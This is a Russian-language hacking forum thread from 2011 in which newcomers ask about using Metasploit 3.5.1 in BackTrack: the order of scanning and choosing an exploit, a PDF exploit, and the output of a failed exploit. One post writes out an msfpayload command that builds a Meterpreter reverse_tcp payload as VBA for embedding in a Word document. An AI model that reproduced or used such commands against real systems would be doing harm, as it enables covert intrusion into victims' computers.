Вопрос по Metasploit 3.5.1

Discussion in 'Песочница' started by Юдат, 31 Mar 2011.

  1. Юдат

    Юдат New Member

    Joined:
    1 Sep 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Доброго всем времени суток!
    В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:
    никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?
    Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?
    З.Ы. в манах ничего не нашел =(

    И хотел бы уточнить, правильно ли я понимаю порядок действий?
    1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий
    2. находение сплоита отвечающего требованиям найденного, и конечной цели
    3. использование сплоита с начинкой.

    Зарание спасибо.
     
  2. neofit

    neofit Banned

    Joined:
    14 Nov 2009
    Messages:
    223
    Likes Received:
    14
    Reputations:
    0
    Приветствую всё правелоно только целевая тачка должна быть с тобою в одной сети или прямой IP с обеех старон.
    Ну и автоподбор эксплойта рекомендую fast-track.
     
  3. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,130
    Likes Received:
    74
    Reputations:
    34
    ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))
    ????
     
  4. neofit

    neofit Banned

    Joined:
    14 Nov 2009
    Messages:
    223
    Likes Received:
    14
    Reputations:
    0
    С другом твоим в локалке)))
     
  5. pahom

    pahom New Member

    Joined:
    16 Mar 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. у меня такая проблемка
    прописываю msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port V > test.bas
    после это создаю вордовский документ .doc вставляю туда test.bas через visual basic и когда нажимаю сохранить выводит ошибку "сбой сохранения из-за недостатка памяти или места на диске"
    места на диске 30 гб
    подскажите в чем проблема?
    спасибо.
     
  6. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    после запуска сплоита получаю вот такой ответ
    [*] Started reverse double handler
    [*] Sending Backdoor Command
    [-] Not backdoored
    [*] Exploit completed, but no session was created.

    это значит что просто не удалось создать обратную связь (плохая начинка)? или что эксплойт не сработал?
     
  7. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    А не мог бы ты подробнее описать как и чем ты все это делаешь)) команды хочу узнать)
     
  8. K800

    K800 Nobody's Fool

    Joined:
    25 Dec 2010
    Messages:
    2,190
    Likes Received:
    3,825
    Reputations:
    372
    1 person likes this.
Loading...